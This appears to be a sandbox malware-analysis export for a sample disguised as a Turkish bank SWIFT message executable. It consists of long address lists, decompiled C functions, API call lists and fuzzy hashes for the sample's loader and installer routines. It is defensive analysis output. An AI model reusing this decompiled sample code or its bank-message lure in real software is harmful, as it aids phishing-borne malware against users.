                                  0x00405fae
                                  0x00405fae
                                  0x00405fb1
                                  0x00405fb5
                                  0x00000000
                                  0x00000000
                                  0x00405fb7
                                  0x00405fbd
                                  0x00405fe7
                                  0x00405fed
                                  0x00405ff4
                                  0x00000000
                                  0x00405ff4
                                  0x00405fc3
                                  0x00405fc6
                                  0x00405fcb
                                  0x00405fcb
                                  0x00405fd6
                                  0x00405fde
                                  0x00405fe1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406026
                                  0x0040602c
                                  0x0040602f
                                  0x0040603c
                                  0x00406044
                                  0x00000000
                                  0x00000000
                                  0x00405ffb
                                  0x00405ffb
                                  0x00405fff
                                  0x0040684a
                                  0x00000000
                                  0x0040684a
                                  0x0040600b
                                  0x00406016
                                  0x00406016
                                  0x00406016
                                  0x00406019
                                  0x0040601c
                                  0x0040601f
                                  0x00406024
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004062eb
                                  0x004062ef
                                  0x0040630d
                                  0x00406310
                                  0x00406317
                                  0x0040631a
                                  0x0040631d
                                  0x00406320
                                  0x00406323
                                  0x00406326
                                  0x00406328
                                  0x0040632f
                                  0x00406330
                                  0x00406332
                                  0x00406335
                                  0x00406338
                                  0x0040633b
                                  0x0040633b
                                  0x00406340
                                  0x00000000
                                  0x00406340
                                  0x004062f1
                                  0x004062f4
                                  0x004062f7
                                  0x00406301
                                  0x00000000
                                  0x00000000
                                  0x00406355
                                  0x00406359
                                  0x0040637c
                                  0x0040637f
                                  0x00406382
                                  0x0040638c
                                  0x0040635b
                                  0x0040635b
                                  0x0040635e
                                  0x00406361
                                  0x00406364
                                  0x00406371
                                  0x00406374
                                  0x00406374
                                  0x00000000
                                  0x00000000
                                  0x00406398
                                  0x0040639c
                                  0x00000000
                                  0x00000000
                                  0x004063a2
                                  0x004063a6
                                  0x00000000
                                  0x00000000
                                  0x004063ac
                                  0x004063ae
                                  0x004063b2
                                  0x004063b2
                                  0x004063b5
                                  0x004063b9
                                  0x00000000
                                  0x00000000
                                  0x00406409
                                  0x0040640d
                                  0x00406414
                                  0x00406417
                                  0x0040641a
                                  0x00406424
                                  0x00000000
                                  0x00406424
                                  0x0040640f
                                  0x00000000
                                  0x00000000
                                  0x00406430
                                  0x00406434
                                  0x0040643b
                                  0x0040643e
                                  0x00406441
                                  0x00406436
                                  0x00406436
                                  0x00406436
                                  0x00406444
                                  0x00406447
                                  0x0040644a
                                  0x0040644a
                                  0x0040644d
                                  0x00406450
                                  0x00406453
                                  0x00406453
                                  0x00406456
                                  0x0040645d
                                  0x00406462
                                  0x00000000
                                  0x00000000
                                  0x004064f0
                                  0x004064f0
                                  0x004064f4
                                  0x00406892
                                  0x00000000
                                  0x00406892
                                  0x004064fa
                                  0x004064fd
                                  0x00406500
                                  0x00406504
                                  0x00406507
                                  0x0040650d
                                  0x0040650f
                                  0x0040650f
                                  0x0040650f
                                  0x00406512
                                  0x00406515
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406573
                                  0x00406573
                                  0x00406577
                                  0x0040689e
                                  0x00000000
                                  0x0040689e
                                  0x0040657d
                                  0x00406580
                                  0x00406583
                                  0x00406587
                                  0x0040658a
                                  0x00406590
                                  0x00406592
                                  0x00406592
                                  0x00406592
                                  0x00406595
                                  0x00000000
                                  0x00000000
                                  0x00406343
                                  0x00406343
                                  0x00406346
                                  0x00000000
                                  0x00000000
                                  0x00406682
                                  0x00406686
                                  0x004066a8
                                  0x004066ab
                                  0x004066b5
                                  0x00000000
                                  0x004066b5
                                  0x00406688
                                  0x0040668b
                                  0x0040668f
                                  0x00406692
                                  0x00406692
                                  0x00406695
                                  0x00000000
                                  0x00000000
                                  0x0040673f
                                  0x00406743
                                  0x00406761
                                  0x00406761
                                  0x00406761
                                  0x00406768
                                  0x0040676f
                                  0x00406776
                                  0x00406776
                                  0x00000000
                                  0x00406776
                                  0x00406745
                                  0x00406748
                                  0x0040674b
                                  0x0040674e
                                  0x00406755
                                  0x00406699
                                  0x00406699
                                  0x0040669c
                                  0x00000000
                                  0x00000000
                                  0x00406830
                                  0x00406833
                                  0x00000000
                                  0x00000000
                                  0x0040646a
                                  0x0040646c
                                  0x00406473
                                  0x00406474
                                  0x00406476
                                  0x00406479
                                  0x00000000
                                  0x00000000
                                  0x00406481
                                  0x00406484
                                  0x00406487
                                  0x00406489
                                  0x0040648b
                                  0x0040648b
                                  0x0040648c
                                  0x0040648f
                                  0x00406496
                                  0x00406499
                                  0x004064a7
                                  0x00000000
                                  0x00000000
                                  0x0040677d
                                  0x0040677d
                                  0x00406780
                                  0x00406787
                                  0x00000000
                                  0x00000000
                                  0x0040678c
                                  0x0040678c
                                  0x00406790
                                  0x004068c8
                                  0x00000000
                                  0x004068c8
                                  0x00406796
                                  0x00406799
                                  0x0040679c
                                  0x004067a0
                                  0x004067a3
                                  0x004067a9
                                  0x004067ab
                                  0x004067ab
                                  0x004067ab
                                  0x004067ae
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b4
                                  0x004067b4
                                  0x004067b8
                                  0x00406818
                                  0x0040681b
                                  0x00406820
                                  0x00406821
                                  0x00406823
                                  0x00406825
                                  0x00406828
                                  0x00000000
                                  0x00406828
                                  0x004067ba
                                  0x004067c0
                                  0x004067c3
                                  0x004067c6
                                  0x004067c9
                                  0x004067cc
                                  0x004067cf
                                  0x004067d2
                                  0x004067d5
                                  0x004067d8
                                  0x004067db
                                  0x004067f4
                                  0x004067f7
                                  0x004067fa
                                  0x004067fd
                                  0x00406801
                                  0x00406803
                                  0x00406803
                                  0x00406804
                                  0x00406807
                                  0x004067dd
                                  0x004067dd
                                  0x004067e5
                                  0x004067ea
                                  0x004067ec
                                  0x004067ef
                                  0x004067ef
                                  0x0040680a
                                  0x00406811
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x004064af
                                  0x004064b2
                                  0x004064e8
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x0040661b
                                  0x0040661b
                                  0x0040661e
                                  0x00406620
                                  0x004068aa
                                  0x00000000
                                  0x004068aa
                                  0x00406626
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662f
                                  0x00406633
                                  0x00406636
                                  0x00406636
                                  0x00406636
                                  0x00000000
                                  0x00406636
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064ba
                                  0x004064bd
                                  0x004064be
                                  0x004064c0
                                  0x004064c2
                                  0x004064c5
                                  0x004064c8
                                  0x004064de
                                  0x004064e3
                                  0x0040651b
                                  0x0040651b
                                  0x0040651f
                                  0x0040654b
                                  0x0040654d
                                  0x00406554
                                  0x00406557
                                  0x0040655a
                                  0x0040655a
                                  0x0040655f
                                  0x0040655f
                                  0x00406561
                                  0x00406564
                                  0x0040656b
                                  0x0040656e
                                  0x0040659b
                                  0x0040659b
                                  0x0040659e
                                  0x004065a1
                                  0x00406615
                                  0x00406615
                                  0x00406615
                                  0x00000000
                                  0x00406615
                                  0x004065a3
                                  0x004065a9
                                  0x004065ac
                                  0x004065af
                                  0x004065b2
                                  0x004065b5
                                  0x004065b8
                                  0x004065bb
                                  0x004065be
                                  0x004065c1
                                  0x004065c4
                                  0x004065dd
                                  0x004065df
                                  0x004065e2
                                  0x004065e3
                                  0x004065e6
                                  0x004065e8
                                  0x004065eb
                                  0x004065ed
                                  0x004065ef
                                  0x004065f2
                                  0x004065f4
                                  0x004065f7
                                  0x004065fb
                                  0x004065fd
                                  0x004065fd
                                  0x004065fe
                                  0x00406601
                                  0x00406604
                                  0x004065c6
                                  0x004065c6
                                  0x004065ce
                                  0x004065d3
                                  0x004065d5
                                  0x004065d8
                                  0x004065d8
                                  0x00406607
                                  0x0040660e
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00000000
                                  0x00406610
                                  0x00000000
                                  0x00406610
                                  0x0040660e
                                  0x00406521
                                  0x00406524
                                  0x00406526
                                  0x00406529
                                  0x0040652c
                                  0x0040652f
                                  0x00406531
                                  0x00406534
                                  0x00406537
                                  0x00406537
                                  0x0040653a
                                  0x0040653a
                                  0x0040653d
                                  0x00406544
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00000000
                                  0x00406546
                                  0x00000000
                                  0x00406546
                                  0x00406544
                                  0x004064ca
                                  0x004064cd
                                  0x004064cf
                                  0x004064d2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004063bc
                                  0x004063bc
                                  0x004063c0
                                  0x00406886
                                  0x00000000
                                  0x00406886
                                  0x004063c6
                                  0x004063c9
                                  0x004063cc
                                  0x004063cf
                                  0x004063d1
                                  0x004063d1
                                  0x004063d1
                                  0x004063d4
                                  0x004063d7
                                  0x004063da
                                  0x004063dd
                                  0x004063e0
                                  0x004063e3
                                  0x004063e4
                                  0x004063e6
                                  0x004063e6
                                  0x004063e6
                                  0x004063e9
                                  0x004063ec
                                  0x004063ef
                                  0x004063f2
                                  0x004063f2
                                  0x004063f2
                                  0x004063f5
                                  0x00000000
                                  0x00000000
                                  0x00406639
                                  0x00406639
                                  0x00406639
                                  0x0040663d
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406646
                                  0x00406649
                                  0x0040664c
                                  0x0040664e
                                  0x0040664e
                                  0x0040664e
                                  0x00406651
                                  0x00406654
                                  0x00406657
                                  0x0040665a
                                  0x0040665d
                                  0x00406660
                                  0x00406661
                                  0x00406663
                                  0x00406663
                                  0x00406663
                                  0x00406666
                                  0x00406669
                                  0x0040666c
                                  0x0040666f
                                  0x00406672
                                  0x00406676
                                  0x00406678
                                  0x0040667b
                                  0x00000000
                                  0x0040667d
                                  0x00000000
                                  0x0040667d
                                  0x0040667b
                                  0x004068b0
                                  0x00000000
                                  0x00000000
                                  0x00405edf

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                                  • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                                  • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                                  • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 614 405d7c-405d90 FindFirstFileA 615 405d92-405d9b FindClose 614->615 616 405d9d 614->616 617 405d9f-405da0 615->617 616->617
                                  C-Code - Quality: 100%
                                  			E00405D7C(CHAR* _a4) {
                                  				void* _t2;
                                  
                                  				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                                  				if(_t2 == 0xffffffff) {
                                  					return 0;
                                  				}
                                  				FindClose(_t2);
                                  				return 0x4224e8;
                                  			}




                                  0x00405d87
                                  0x00405d90
                                  0x00000000
                                  0x00405d9d
                                  0x00405d93
                                  0x00000000

                                  APIs
                                  • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,76D7F560,004053BE,?,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,76D7F560), ref: 00405D87
                                  • FindClose.KERNEL32(00000000), ref: 00405D93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: $B
                                  • API String ID: 2295610775-2366330246
                                  • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                                  • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                                  • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                                  • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405DA3(signed int _a4) {
                                  				struct HINSTANCE__* _t5;
                                  				CHAR* _t7;
                                  				signed int _t9;
                                  
                                  				_t9 = _a4 << 3;
                                  				_t7 =  *(_t9 + 0x409218);
                                  				_t5 = GetModuleHandleA(_t7);
                                  				if(_t5 != 0) {
                                  					L2:
                                  					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                                  				}
                                  				_t5 = LoadLibraryA(_t7); // executed
                                  				if(_t5 != 0) {
                                  					goto L2;
                                  				}
                                  				return _t5;
                                  			}






                                  0x00405dab
                                  0x00405dae
                                  0x00405db5
                                  0x00405dbd
                                  0x00405dca
                                  0x00000000
                                  0x00405dd1
                                  0x00405dc0
                                  0x00405dc8
                                  0x00000000
                                  0x00000000
                                  0x00405dd9

                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                                  • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: AddressHandleLibraryLoadModuleProc
                                  • String ID:
                                  • API String ID: 310444273-0
                                  • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                                  • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                                  • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                                  • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 119 403659-403678 call 403897 call 405659 111->119 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->119 126 40367e-403683 119->126 127 4036ff-403707 call 405659 119->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 140 4036be-4036ca lstrlenA 135->140 141 4036af-4036bc call 4055a3 135->141 142 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->142 143 40388d 137->143 150 4037d3-4037d6 138->150 151 4037db-4037e6 call 403897 138->151 147 4036f2-4036fa call 405578 call 405a85 140->147 148 4036cc-4036da lstrcmpiA 140->148 141->140 142->138 145 40388f-403896 143->145 147->127 148->147 149 4036dc-4036e6 GetFileAttributesA 148->149 154 4036e8-4036ea 149->154 155 4036ec-4036ed call 4055bf 149->155 150->145 161 403864-40386c call 404ef5 151->161 162 4037e8-403805 ShowWindow LoadLibraryA 151->162 154->147 154->155 155->147 169 403886-403888 call 40140b 161->169 170 40386e-403874 161->170 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 167 403822-403832 GetClassInfoA RegisterClassA 164->167 168 403838-403862 DialogBoxParamA call 40140b 164->168 167->168 168->145 169->143 170->150 172 40387a-403881 call 40140b 170->172 172->150
                                  C-Code - Quality: 96%
                                  			E004035E3() {
                                  				intOrPtr _v4;
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				int _v16;
                                  				char _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t20;
                                  				void* _t28;
                                  				void* _t30;
                                  				int _t31;
                                  				void* _t34;
                                  				struct HINSTANCE__* _t37;
                                  				int _t38;
                                  				int _t42;
                                  				char _t61;
                                  				CHAR* _t63;
                                  				signed char _t67;
                                  				CHAR* _t78;
                                  				intOrPtr _t80;
                                  				CHAR* _t85;
                                  
                                  				_t80 =  *0x423eb0;
                                  				_t20 = E00405DA3(6);
                                  				_t87 = _t20;
                                  				if(_t20 == 0) {
                                  					_t78 = 0x420498;
                                  					"1033" = 0x7830;
                                  					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                                  					__eflags =  *0x420498;
                                  					if(__eflags == 0) {
                                  						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                                  					}
                                  					lstrcatA("1033", _t78);
                                  				} else {
                                  					E004059E3("1033",  *_t20() & 0x0000ffff);
                                  				}
                                  				E00403897(_t75, _t87);
                                  				_t84 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp";
                                  				 *0x423f20 =  *0x423eb8 & 0x00000020;
                                  				if(E00405659(_t87, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") != 0) {
                                  					L16:
                                  					if(E00405659(_t95, _t84) == 0) {
                                  						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                                  					}
                                  					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                                  					 *0x423688 = _t28;
                                  					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                  						L21:
                                  						if(E0040140B(0) == 0) {
                                  							_t30 = E00403897(_t75, __eflags);
                                  							__eflags =  *0x423f40;
                                  							if( *0x423f40 != 0) {
                                  								_t31 = E00404EF5(_t30, 0);
                                  								__eflags = _t31;
                                  								if(_t31 == 0) {
                                  									E0040140B(1);
                                  									goto L33;
                                  								}
                                  								__eflags =  *0x42366c;
                                  								if( *0x42366c == 0) {
                                  									E0040140B(2);
                                  								}
                                  								goto L22;
                                  							}
                                  							ShowWindow( *0x420470, 5);
                                  							_t37 = LoadLibraryA("RichEd20");
                                  							__eflags = _t37;
                                  							if(_t37 == 0) {
                                  								LoadLibraryA("RichEd32");
                                  							}
                                  							_t85 = "RichEdit20A";
                                  							_t38 = GetClassInfoA(0, _t85, 0x423640);
                                  							__eflags = _t38;
                                  							if(_t38 == 0) {
                                  								GetClassInfoA(0, "RichEdit", 0x423640);
                                  								 *0x423664 = _t85;
                                  								RegisterClassA(0x423640);
                                  							}
                                  							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
                                  							E0040140B(5);
                                  							return _t42;
                                  						}
                                  						L22:
                                  						_t34 = 2;
                                  						return _t34;
                                  					} else {
                                  						_t75 =  *0x423ea0;
                                  						 *0x423654 = _t28;
                                  						_v20 = 0x624e5f;
                                  						 *0x423644 = E00401000;
                                  						 *0x423650 =  *0x423ea0;
                                  						 *0x423664 =  &_v20;
                                  						if(RegisterClassA(0x423640) == 0) {
                                  							L33:
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  						_t12 =  &_v16; // 0x624e5f
                                  						SystemParametersInfoA(0x30, 0, _t12, 0);
                                  						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                                  						goto L21;
                                  					}
                                  				} else {
                                  					_t75 =  *(_t80 + 0x48);
                                  					if(_t75 == 0) {
                                  						goto L16;
                                  					}
                                  					_t78 = 0x422e40;
                                  					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
                                  					_t61 =  *0x422e40; // 0x73
                                  					if(_t61 == 0) {
                                  						goto L16;
                                  					}
                                  					if(_t61 == 0x22) {
                                  						_t78 = 0x422e41;
                                  						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                                  					}
                                  					_t63 = lstrlenA(_t78) + _t78 - 4;
                                  					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                                  						L15:
                                  						E00405A85(_t84, E00405578(_t78));
                                  						goto L16;
                                  					} else {
                                  						_t67 = GetFileAttributesA(_t78);
                                  						if(_t67 == 0xffffffff) {
                                  							L14:
                                  							E004055BF(_t78);
                                  							goto L15;
                                  						}
                                  						_t95 = _t67 & 0x00000010;
                                  						if((_t67 & 0x00000010) != 0) {
                                  							goto L15;
                                  						}
                                  						goto L14;
                                  					}
                                  				}
                                  			}

























                                  0x004035e9
                                  0x004035f2
                                  0x004035f9
                                  0x004035fb
                                  0x0040360f
                                  0x00403621
                                  0x0040362b
                                  0x00403630
                                  0x00403636
                                  0x00403649
                                  0x00403649
                                  0x00403654
                                  0x004035fd
                                  0x00403608
                                  0x00403608
                                  0x00403659
                                  0x00403663
                                  0x0040366c
                                  0x00403678
                                  0x004036ff
                                  0x00403707
                                  0x00403710
                                  0x00403710
                                  0x00403726
                                  0x0040372c
                                  0x0040373a
                                  0x004037c9
                                  0x004037d1
                                  0x004037db
                                  0x004037e0
                                  0x004037e6
                                  0x00403865
                                  0x0040386a
                                  0x0040386c
                                  0x00403888
                                  0x00000000
                                  0x00403888
                                  0x0040386e
                                  0x00403874
                                  0x0040387c
                                  0x0040387c
                                  0x00000000
                                  0x00403874
                                  0x004037f0
                                  0x00403801
                                  0x00403803
                                  0x00403805
                                  0x0040380c
                                  0x0040380c
                                  0x00403814
                                  0x0040381c
                                  0x0040381e
                                  0x00403820
                                  0x00403829
                                  0x0040382c
                                  0x00403832
                                  0x00403832
                                  0x00403851
                                  0x0040385b
                                  0x00000000
                                  0x00403860
                                  0x004037d3
                                  0x004037d5
                                  0x00000000
                                  0x00403740
                                  0x00403740
                                  0x00403746
                                  0x00403750
                                  0x00403758
                                  0x00403762
                                  0x00403768
                                  0x00403776
                                  0x0040388d
                                  0x0040388d
                                  0x00000000
                                  0x0040388d
                                  0x0040377c
                                  0x00403785
                                  0x004037c4
                                  0x00000000
                                  0x004037c4
                                  0x0040367e
                                  0x0040367e
                                  0x00403683
                                  0x00000000
                                  0x00000000
                                  0x0040368d
                                  0x0040369d
                                  0x004036a2
                                  0x004036a9
                                  0x00000000
                                  0x00000000
                                  0x004036ad
                                  0x004036af
                                  0x004036bc
                                  0x004036bc
                                  0x004036c4
                                  0x004036ca
                                  0x004036f2
                                  0x004036fa
                                  0x00000000
                                  0x004036dc
                                  0x004036dd
                                  0x004036e6
                                  0x004036ec
                                  0x004036ed
                                  0x00000000
                                  0x004036ed
                                  0x004036e8
                                  0x004036ea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004036ea
                                  0x004036ca

                                  APIs
                                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                                  • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ,00000000,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403654
                                  • lstrlenA.KERNEL32(szoimsdvi,?,?,?,szoimsdvi,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" ), ref: 004036BF
                                  • lstrcmpiA.KERNEL32(?,.exe,szoimsdvi,?,?,?,szoimsdvi,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                                  • GetFileAttributesA.KERNEL32(szoimsdvi), ref: 004036DD
                                  • LoadImageA.USER32 ref: 00403726
                                    • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                                  • RegisterClassA.USER32 ref: 0040376D
                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                                  • CreateWindowExA.USER32 ref: 004037BE
                                  • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                                  • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                                  • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                                  • GetClassInfoA.USER32 ref: 0040381C
                                  • GetClassInfoA.USER32 ref: 00403829
                                  • RegisterClassA.USER32 ref: 00403832
                                  • DialogBoxParamA.USER32 ref: 00403851
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$szoimsdvi
                                  • API String ID: 914957316-2164015157
                                  • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                                  • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                                  • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                                  • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
